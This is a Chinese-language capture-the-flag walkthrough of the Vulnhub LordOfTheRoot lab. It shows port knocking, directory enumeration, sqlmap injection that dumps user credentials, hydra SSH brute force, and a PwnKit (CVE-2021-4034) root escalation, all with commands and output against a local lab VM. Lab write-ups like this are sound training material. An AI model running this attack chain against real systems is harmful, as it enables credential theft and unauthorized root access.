Vulnhub-LordOfTheRoot靶场渗透
目标发现
由于在同一子网内,直接使用 arp-scan 扫描,找出另一个主机
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.170 00:0c:29:b1:ac:0c (Unknown)
192.168.120.254 00:50:56:fc:9b:3c (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.077 seconds (123.25 hosts/sec). 4 responded
可以得知目标主机ip为 192.168.120.170
信息搜集
端口扫描
开放端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.170 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:06 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00039s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds
开放端口及目标信息
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p22 192.168.120.170
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:08 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00060s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (89%), Linux 3.13 - 3.16 (87%), Linux 3.16 (87%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 192.168.120.170
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.89 seconds
目前得到以下信息:
- 开放端口22
访问后得到一个提示:
knock ftiend to enter(敲门进入)
Easy as 1,2,3
猜测要使用端口试探,按照一个顺序访问端口,才能开放某些端口
端口碰撞
PS:端口碰撞
通过尝试连接,从外部打开原先关闭的端口的方法。一旦收到正确顺序的连接尝试,防火墙就会动态打开一些端口给运行尝试连接的主机。
操作步骤:
nmap -Pn -r target -p 1,2,3 # -r 按顺序访问端口1,2,3 nmap -sS -p- target --min-rate=1000 nmap -A -p<port> target # 使用上一条命令得到的开放端口或者使用
Knock工具 进行尝试连接端口-i,–interface 指定要监听的接口。默认值为eth0。 -d,–daemon 成为守护程序。这通常是正常的类似服务器的操作所需要的。 -c,-config <文件> 指定配置文件的备用位置。默认值为/etc/knockd.conf。 -D,-调试 Ouput调试消息。 -l --lookup 查找日志条目的DNS名称。这可能会带来安全风险!请参阅“安全说明”部分。 -v,–verbose 输出详细状态消息。 -V,–version 显示版本。 -h,–help 语法帮助。 eg: knock 192.168.120.170 1 2 3
┌──(root㉿kali)-[/home/kali]
└─# nmap -Pn -r 192.168.120.170 -p 1,2,3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:31 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00044s latency).
PORT STATE SERVICE VERSION
1/tcp filtered tcpmux
2/tcp filtered compressnet
3/tcp filtered compressnet
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.87 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.170 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:31 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00036s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.50 seconds
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -p22,1337 192.168.120.170
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-03 01:32 EDT
Nmap scan report for 192.168.120.170
Host is up (0.00059s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B1:AC:0C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (89%), Linux 3.13 - 3.16 (87%), Linux 3.16 (87%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.58 ms 192.168.120.170
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.15 seconds
这次可以发现多了一个网站的端口,运行了一个 waste 站点
网站目录扫描
使用gobuster对目标站点进行目录扫描
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.120.170:1337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.170:1337/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: js,config,log,git,html,asp,aspx,jsp,bak,swp,env,json,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 288]
/.html (Status: 403) [Size: 289]
/index.html (Status: 200) [Size: 64]
/images (Status: 301) [Size: 325] [--> http://192.168.120.170:1337/images/]
/404.html (Status: 200) [Size: 116]
/.php (Status: 403) [Size: 288]
/.html (Status: 403) [Size: 289]
/server-status (Status: 403) [Size: 297]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
发现了三个有效页面:
- /images/
- /404.html
- /index.html
访问页面
通过curl访问页面后得到四个图片,其中三个是html伪装的,通过strings得到其中的文本信息:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# file back.gif blank.gif image2.gif iwilldoit.jpg
back.gif: HTML document, ASCII text
blank.gif: HTML document, ASCII text
image2.gif: HTML document, ASCII text
iwilldoit.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 336x512, components 3
┌──(root㉿kali)-[/home/kali/Downloads]
└─# strings back.gif blank.gif image2.gif iwilldoit.jpg
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
JFIF
$.' ",#
(7),01444
'9=82<.342
!22222222222222222222222222222222222222222222222222
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
KN:}
&$'y
B`~Bs
?:K-
.......
其中的文本信息中的注释中有同一串字符,/404.html 页面中也有同样的一串字符
┌──(root㉿kali)-[/home/kali/Downloads]
└─# curl http://192.168.120.170:1337/404.html
<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>
通过检测,发现是base64编码:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh' | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo 'Lzk3ODM0NTIxMC9pbmRleC5waHA=' | base64 -d
/978345210/index.php
还是两层编码,解码后得到一个路径,再次进行目录扫描
二次目录扫描
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://192.168.120.170:1337/978345210/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.170:1337/978345210/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 400,404
[+] User Agent: gobuster/3.6
[+] Extensions: log,git,html,js,asp,jsp,bak,config,env,json,php,txt,aspx,swp
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 0]
/index.php (Status: 200) [Size: 485]
/profile.php (Status: 302) [Size: 262] [--> index.php]
/.html (Status: 403) [Size: 299]
/.php (Status: 403) [Size: 298]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/.html (Status: 403) [Size: 299]
/.php (Status: 403) [Size: 298]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
发现了四个有效页面:
- /login.php => /index.php
- /logout.php
- /profile.php
访问得到的路径后,就一个登录页面有效:
只能尝试sql注入
sql注入
使用sqlmap进行注入
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms
-o:开启所有优化
-u:指定目标URL
--forms:表单自动判断注入
获取所有库
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms --dbs
获取Webapp下所有表
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms -D webapp --tables
获取Users表内所有列名
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms -D Webapp -T Users --columns
获取字段的值
sqlmap -o -u "http://192.168.120.170:1337/978345210/index.php" --forms -D Webapp -T Users -C username,password --dump
经尝试,所有用户登录后的页面都一样:
没有任何有效信息
权限获取
尝试使用刚才得到的用户凭据,进行ssh爆破,是否可以登录:
┌──(root㉿kali)-[/home/kali/Templates]
└─# hydra -L user.txt -P pass.txt 192.168.120.170 ssh -t 4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-03 07:59:05
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking ssh://192.168.120.170:22/
[22][ssh] host: 192.168.120.170 login: smeagol password: MyPreciousR00t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-03 07:59:20
可以看到,存在一个有效账户
尝试登录:
成功登录~
权限提升
当前权限不够,那么就要进行权限提升了,将内核漏洞探测的脚本上传进行自动检测后发现有三个可能性高的exp:
经过尝试,发现第三个可以成功提权:
smeagol@LordOfTheRoot:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034.c cve-2021-4034.sh dry-run LICENSE Makefile pwnkit.c README.md
smeagol@LordOfTheRoot:/tmp/CVE-2021-4034-main$ ./cve-2021-4034.sh
wget: unrecognized option '--no-hsts'
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
wget: unrecognized option '--no-hsts'
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
wget: unrecognized option '--no-hsts'
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
# /bin/bash
root@LordOfTheRoot:/tmp/CVE-2021-4034-main# id
uid=0(root) gid=0(root) groups=0(root),1000(smeagol)
获取flag:
root@LordOfTheRoot:/root# ls
Flag.txt buf buf.c other other.c switcher.py
root@LordOfTheRoot:/root# cat Flag.txt
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
总结
获取到的用户信息是有用的,不要认为在某个地方尝试后没有有效信息就丢弃,可以将他们作为所有的需要登录的地方的爆破字典;如果sqlmap尝试后无效,可以多尝试几次+手工配合,这个靶场中我尝试了多次sqlmap,前几次都没成功,后面就成功了。
浙公网安备 33010602011771号